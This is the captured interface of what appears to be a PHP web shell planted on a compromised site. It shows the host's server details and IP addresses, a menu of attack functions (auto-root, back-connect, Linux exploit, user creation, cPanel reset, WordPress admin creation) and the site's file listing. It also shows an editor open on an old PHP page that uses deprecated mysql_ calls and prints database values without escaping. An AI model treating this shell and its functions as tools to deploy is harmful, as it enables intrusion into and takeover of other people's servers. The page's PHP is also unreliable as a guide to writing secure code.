Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
images /
acmesolar /
[ HOME SHELL ]
Name
Size
Permission
Action
acmeadmin
[ DIR ]
drwxr-xr-x
400.shtml
130
B
-rw-r--r--
401.shtml
162
B
-rw-r--r--
403.shtml
201
B
-rw-r--r--
404.shtml
83
B
-rw-r--r--
500.php
461
B
-rw-r--r--
500.shtml
71
B
-rw-r--r--
acme-aboutus.php
1.38
KB
-rw-r--r--
acme-contactus.php
10.2
KB
-rw-r--r--
acme-events.php
1.38
KB
-rw-r--r--
acme-footer.php
128
B
-rw-r--r--
acme-header.php
813
B
-rw-r--r--
acme-header_5_oct_12.php
786
B
-rw-r--r--
acme-home.php
5.45
KB
-rw-r--r--
acme-home_5_oct_12.php
3.1
KB
-rw-r--r--
acme-leftpart.php
1.61
KB
-rw-r--r--
acme-manufacturingfacality.php
1.4
KB
-rw-r--r--
acme-productdetail.php
4.93
KB
-rw-r--r--
acme-productdetail_5_oct_12.ph...
4.93
KB
-rw-r--r--
acme-sitemap.php
1.38
KB
-rw-r--r--
client_connection.php
453
B
-rw-r--r--
default.html
0
B
-rw-r--r--
error_log
142.92
KB
-rw-r--r--
favicon.ico
43
B
-rw-r--r--
home.css
5.64
KB
-rw-r--r--
home_5_oct_12.css
3.38
KB
-rw-r--r--
index.php
44
B
-rw-r--r--
recaptchalib.php
9.53
KB
-rw-r--r--
subpage-9-oct.css
1.26
KB
-rw-r--r--
subpage.css
1.59
KB
-rw-r--r--
subpage_5_oct_12.css
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acme-home_5_oct_12.php
<?php include "common/client_connection.php"; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title><?php echo $title_AcmeSolarFood; ?>-<?php echo $title_Homepage; ?></title> <link href="home.css" rel="stylesheet" type="text/css" /> <!-- For Slideshow --> <script language="javascript" type="text/javascript" src="js/jquery.min.js"></script> <script language="javascript" type="text/javascript" src="js/jquery.cycle.all.2.74.js"></script> <script type="text/javascript"> $(document).ready(function() { $('.slideshow').cycle({ fx: 'fade' // choose your transition type, ex: fade, scrollUp, shuffle, etc... }); }); </script> <!-- End Slideshow --> </head> <body> <div class="maindiv"> <div class="container"> <div class="header"> <?php include "acme-header.php"; ?> </div> <div class="photo"> <div class="slideshow"> <?php $selquery=mysql_query("select slideshow_id,image,link,tooltip,visible from home_slideshow where visible='1'"); while($fetchval=mysql_fetch_array($selquery)) { echo "<img src='images/slideshow/".$fetchval['image']."' alt=''>"; } ?> </div> <!-- <img src="images/homephoto01.jpg" alt="mainphoto" /> --> </div> <div class="maincont"> <div class="welcome"> <!-- <img src="images/welcome.png" alt="Welome to Acme Solar Food" /> --> <?php $getHomeContent = getFieldValue("content","homepage","id=1"); echo stripslashes($getHomeContent); ?> </div> <div class="homeproduct"> <!-- <img src="images/productcat.png" alt="Product Catagory" /> --> <h1>PRODUCTS</h1> <p> <?php $qrySelProdType = "SELECT prod_type_id,image FROM product_type WHERE visible=1"; $qSelProdType = mysql_query($qrySelProdType); while($fetchRec = mysql_fetch_array($qSelProdType)) { $prodTypeId = $fetchRec["prod_type_id"]; $prodImage = $fetchRec["image"]; $prodTypeTitle = $fetchRec["prod_type_title"]; ?> <a href="acme-productdetail.php?id=<?php echo $prodTypeId; ?>"> <img src="images/prodtypeimage/thumbnail/<?php echo $prodImage; ?>" alt="<?php echo $prodTypeTitle; ?>" /> </a> <?php } ?> </p> <!-- <p><a href="#"><img src="images/wheatgrass.png" alt="Wheat Grass" /></a> <a href="#"><img src="images/tomato.png" alt="Tomato" /></a> <a href="#"><img src="images/mango.png" alt="Mango" /></a> <a href="#"><img src="images/ginger.png" alt="Ginger" /></a> <a href="#"><img src="images/safed_musali.png" alt="Safed Musli" /></a> <a href="#"><img src="images/amla.png" alt="Amla" /></a> <a href="#"><img src="images/banana.png" alt="Banana" /></a> <a href="#"><img src="images/sapota.png" alt="Sapota" /></a> </p> --> </div> <?php include "acme-footer.php"; ?> </div> </div> </div> </body> </html>
Close